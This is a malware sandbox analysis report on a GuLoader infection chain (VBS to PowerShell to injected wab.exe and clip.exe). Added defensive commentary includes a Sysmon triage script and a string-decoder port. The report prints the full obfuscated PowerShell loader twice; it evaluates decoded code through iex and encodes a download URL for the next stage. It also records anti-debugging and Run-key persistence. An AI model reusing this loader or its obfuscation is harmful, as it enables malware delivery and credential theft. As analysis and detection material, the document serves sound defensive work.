          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: m.Core.pdbH\ source: powershell.exe, 0000000E.00000002.1648566451.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1659572964.0000000008277000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\System.Core.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082D7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1740507459.000000002216D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1744163245.000000002231B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1740507459.000000002216D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1744163245.000000002231B000.00000004.00000020.00020000.00000000.sdmp, clip.exe
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdb source: wab.exe, wab.exe, 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000E.00000002.1648566451.0000000002AC9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdbGCTL source: wab.exe, 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\symbols\dll\System.Core.pdb source: powershell.exe, 0000000E.00000002.1659753101.00000000082D7000.00000004.00000020.00020000.00000000.sdmp
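          The image-load rows above are worth reading as a set rather than one DLL at a time: clip.exe is a small command-line clipboard utility, yet the instance here loads wininet.dll and winhttp.dll (network), winsqlite3.dll (browser SQLite credential stores), vaultcli.dll (Credential Manager) and dpapi.dll, and then opens the Outlook profile key. That combination in a process with no business doing it is the injected stealer, not the host binary. The script below is an added triage example, not part of the Joe Sandbox report: it applies that reasoning to Sysmon Event ID 7 (Image loaded) records. The records are constructed to mirror the rows above (field names Image, ImageLoaded and ProcessId follow Sysmon's schema; the PIDs, the allowlist of processes expected to combine network and credential-store access, and the capability groupings are assumptions to tune for your estate).

```python
"""Sysmon Event ID 7 triage: flag processes whose loaded-DLL profile matches a
credential stealer.  Added example; event records are constructed, not taken
from the report, and the allowlists are assumptions."""
from collections import defaultdict

# DLL families observed in the report, grouped by what they give the process.
CAPABILITIES = {
    "network": {"wininet.dll", "winhttp.dll", "urlmon.dll", "mswsock.dll", "dnsapi.dll"},
    "credential_store": {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"},
    "tls": {"schannel.dll", "ncryptsslp.dll"},
}

# Assumed allowlist: processes that legitimately combine network access with
# credential stores (browsers, mail clients, admin shells).
EXPECTED = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "powershell.exe"}

# Assumed low-profile utilities (from the report's process list) for which a
# single flagged capability is already worth an analyst's look.
LOW_PROFILE = {"clip.exe", "wab.exe"}


def basename(path):
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_image_loads(events):
    """events: iterable of dicts with Image, ImageLoaded, ProcessId.

    Returns {(image, pid): sorted capability names} for processes that are
    (a) low-profile utilities loading any flagged DLL, or
    (b) any other non-allowlisted process combining network + credential_store
        in the same PID (the stealer profile seen for clip.exe above)."""
    seen = defaultdict(set)
    for ev in events:
        img = basename(ev["Image"])
        dll = basename(ev["ImageLoaded"])
        for cap, names in CAPABILITIES.items():
            if dll in names:
                seen[(img, ev["ProcessId"])].add(cap)
    hits = {}
    for (img, pid), caps in seen.items():
        if img in EXPECTED:
            continue
        if img in LOW_PROFILE or {"network", "credential_store"} <= caps:
            hits[(img, pid)] = sorted(caps)
    return hits


# Constructed records mirroring the report's rows; PIDs are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\clip.exe", "ImageLoaded": r"C:\Windows\SysWOW64\wininet.dll", "ProcessId": 5204},
    {"Image": r"C:\Windows\SysWOW64\clip.exe", "ImageLoaded": r"C:\Windows\SysWOW64\winsqlite3.dll", "ProcessId": 5204},
    {"Image": r"C:\Windows\SysWOW64\clip.exe", "ImageLoaded": r"C:\Windows\SysWOW64\vaultcli.dll", "ProcessId": 5204},
    {"Image": r"C:\Windows\SysWOW64\clip.exe", "ImageLoaded": r"C:\Windows\SysWOW64\dpapi.dll", "ProcessId": 5204},
    {"Image": r"C:\Program Files (x86)\Windows Mail\wab.exe", "ImageLoaded": r"C:\Windows\SysWOW64\winhttp.dll", "ProcessId": 4412},
    {"Image": r"C:\Program Files (x86)\Windows Mail\wab.exe", "ImageLoaded": r"C:\Windows\SysWOW64\schannel.dll", "ProcessId": 4412},
    # Benign control cases: a browser doing the same thing, and a one-off DPAPI load.
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "ImageLoaded": r"C:\Windows\System32\winsqlite3.dll", "ProcessId": 3120},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "ImageLoaded": r"C:\Windows\System32\wininet.dll", "ProcessId": 3120},
    {"Image": r"C:\Windows\System32\notepad.exe", "ImageLoaded": r"C:\Windows\System32\dpapi.dll", "ProcessId": 2211},
]

if __name__ == "__main__":
    for (img, pid), caps in triage_image_loads(SAMPLE_EVENTS).items():
        print(f"{img} (PID {pid}): {', '.join(caps)}")
```

Keying on the PID matters: the report shows several wab.exe instances with different loader profiles, and only the one that also loads the network and TLS stack is the GuLoader stage. Requiring the combination for ordinary processes keeps a single dpapi.dll load (which many legitimate programs do) from paging anyone.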

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERSHELL "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$", "0")
          Source: Yara match | File source: 00000012.00000002.1843095733.00000000036C7000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.1660374596.0000000009B07000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.1660236750.00000000086F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.1653655863.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Behandlingsform)$global:Buldret = [System.Text.Encoding]::ASCII.GetString($Embosom)$global:Brevicauda2=$Buldret.substring($Sycophant,$Fanhouse)<#Andestegs Ulykkers Ejende Blafren Tas
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gteskabsbruddenes $lesses $Altereres), (Anspndende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Outstations = [AppDomain]::CurrentDomain.GetAssemblies()
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Restraighten)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Constantin, $false).DefineType($blindcat, $S
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Behandlingsform)$global:Buldret = [System.Text.Encoding]::ASCII.GetString($Embosom)$global:Brevicauda2=$Buldret.substring($Sycophant,$Fanhouse)<#Andestegs Ulykkers Ejende Blafren Tas
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
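          The string obfuscation in the command line above is simple once the helper is read: `$Radiosender` is assembled as `Substring`, and `Beshout` walks its argument from offset 5 in steps of 6, taking one character per step while the loop bound is `Length-1`, so the final chunk's trailing space is dropped. Every sixth character is payload; the other five are Danish-looking filler. `Lovbundnes` then dot-sources each decoded fragment through `$Afskalningernes`, which decodes to `iex`, so every `Lovbundnes (Beshout '...')` call is `. iex <decoded fragment>`; `$Formaliaers` decodes to `User-Agent`. Below is an added decoder, a port of that routine written for this page and not code from the report or the sample. `beshout_encode`, `looks_intact`, `decode_command_line` and the short `SAMPLE_CMD` context are constructed here; the two literals inside `SAMPLE_CMD` are copied from the command line above. One caveat the length check exists for: the copies of the command line on this page have been through an HTML renderer, which collapses runs of spaces, so long literals such as the one assigned to `$Piggy` (it decodes cleanly as far as `Mozilla/5.0` and then drifts) no longer have a length that is a multiple of six. Decode from the original .vbs or the sandbox's raw command-line capture, not from the rendered report.

```python
"""Port of the sample's Beshout() string decoder, plus an integrity check.
Added example for this page; the scheme is reconstructed from the quoted
command line, the encoder and sample context are constructed here."""
import random
import re
import string

STRIDE = 6   # one payload character per six
FIRST = 5    # offset of the first payload character


def beshout_decode(literal):
    """Equivalent of Beshout(): For($i=5; $i -lt $s.Length-1; $i+=6) take one char.
    The Length-1 bound discards the decoy space that ends every literal."""
    limit = len(literal) - 1
    return "".join(literal[i] for i in range(FIRST, limit, STRIDE))


def looks_intact(literal):
    """Well-formed literals are whole six-character chunks.  A copy that lost
    spaces (HTML whitespace collapsing) fails this and would mis-decode."""
    return len(literal) >= STRIDE and len(literal) % STRIDE == 0


def beshout_encode(plain, seed=0):
    """Inverse transform (constructed, for round-trip testing): five filler
    characters before each payload character, then a decoy chunk ending in a
    space that the Length-1 bound drops on decode."""
    rng = random.Random(seed)
    filler = string.ascii_letters + ".,"
    chunks = ["".join(rng.choice(filler) for _ in range(FIRST)) + c for c in plain]
    chunks.append("".join(rng.choice(filler) for _ in range(FIRST)) + " ")
    return "".join(chunks)


# PowerShell single-quoted literal; '' is the only escape inside it.
LITERAL_RE = re.compile(r"Beshout\s+'((?:[^']|'')*)'")


def decode_command_line(cmd):
    """Find every `Beshout '...'` literal and decode it.  Returns a list of
    (literal, decoded) pairs; decoded is None when the literal is damaged,
    rather than a silently wrong string."""
    out = []
    for m in LITERAL_RE.finditer(cmd):
        lit = m.group(1).replace("''", "'")
        out.append((lit, beshout_decode(lit) if looks_intact(lit) else None))
    return out


# Two literals copied from the command line above, in constructed context.
SAMPLE_CMD = (
    "$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';"
    "$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';"
)

if __name__ == "__main__":
    for lit, dec in decode_command_line(SAMPLE_CMD):
        print(f"{lit!r} -> {dec!r}")
```

Run against the two literals in `SAMPLE_CMD` this yields `iex` and `User-Agent`; a literal with one character missing is reported as `None` instead of a plausible-looking wrong string, which is the failure mode to expect when pasting from a rendered report.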
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCD0983 push E85DB25Dh; ret 2_2_00007FFAACCD09F9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACDA07E8 push eax; ret 2_2_00007FFAACDA07E9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0473E3B0 push eax; retf 14_2_0473E3B1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0473FE02 push esp; retf 14_2_0473FE09
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_075A08C2 push eax; mov dword ptr [esp], ecx14_2_075A0AC4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8AFA3 push es; retf 18_3_06A8AFA4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8A42F push cs; retf 18_3_06A8A430
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A89F07 push cs; iretd 18_3_06A89F08
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A87042 push AA369B36h; iretd 18_3_06A87081
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A86F59 push AA369B36h; iretd 18_3_06A87081
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8A554 push es; ret 18_3_06A8A5BE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8EBB3 push es; retf 18_3_06A8EBB4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A92127 push cs; iretd 18_3_06A92128
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8E03F push cs; retf 18_3_06A8E040
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8DB17 push cs; iretd 18_3_06A8DB18
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A8E164 push es; ret 18_3_06A8E1CE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A92867 push ds; retf 18_3_06A92868
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A92373 push 00000078h; retf 18_3_06A92375
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A90D43 push cs; retf 18_3_06A90D44
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A90445 push cs; retf 18_3_06A90446
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7F0B5 pushad ; ret 18_3_06A7F0C1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7DC80 pushad ; ret 18_3_06A7DC81
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7F18F pushad ; ret 18_3_06A7F199
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7DB9D pushad ; ret 18_3_06A7DBA9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7F4EC pushad ; ret 18_3_06A7F4F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7F5C5 pushad ; ret 18_3_06A7F5D1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7E337 pushad ; ret 18_3_06A7E341
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7CB34 push es; ret 18_3_06A7CB48
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7D26D push eax; retf 18_3_06A7D275
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7ED57 pushad ; ret 18_3_06A7ED61
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_3_06A7E25D pushad ; ret 18_3_06A7E269
          Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1RTLGNO0FDJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1RTLGNO0FDJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0438D1C0 rdtsc 22_2_0438D1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4803
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5098
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5724
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4103
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 822
          Source: C:\Windows\SysWOW64\clip.exe Window / User API: threadDelayed 4345
          Source: C:\Windows\SysWOW64\clip.exe Window / User API: threadDelayed 5629
          Source: C:\Windows\SysWOW64\clip.exe API coverage: 3.0 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6880 Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716 Thread sleep count: 5724 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716 Thread sleep count: 4103 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748 Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8136 Thread sleep count: 822 > 30
          Source: C:\Windows\SysWOW64\clip.exe TID: 6520 Thread sleep count: 4345 > 30
          Source: C:\Windows\SysWOW64\clip.exe TID: 6520 Thread sleep time: -8690000s >= -30000s
          Source: C:\Windows\SysWOW64\clip.exe TID: 6520 Thread sleep count: 5629 > 30
          Source: C:\Windows\SysWOW64\clip.exe TID: 6520 Thread sleep time: -11258000s >= -30000s
          Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_021BB830 FindFirstFileW,FindNextFileW,FindClose, 22_2_021BB830
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: wab.exe, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000002.00000002.1913978757.000002062DB4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0438D1C0 rdtsc 22_2_0438D1C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0459D258 LdrInitializeThunk,LdrInitializeThunk, 14_2_0459D258
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0434A430 mov eax, dword ptr fs:[00000030h] 22_2_0434A430
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0430E420 mov eax, dword ptr fs:[00000030h] 22_2_0430E420
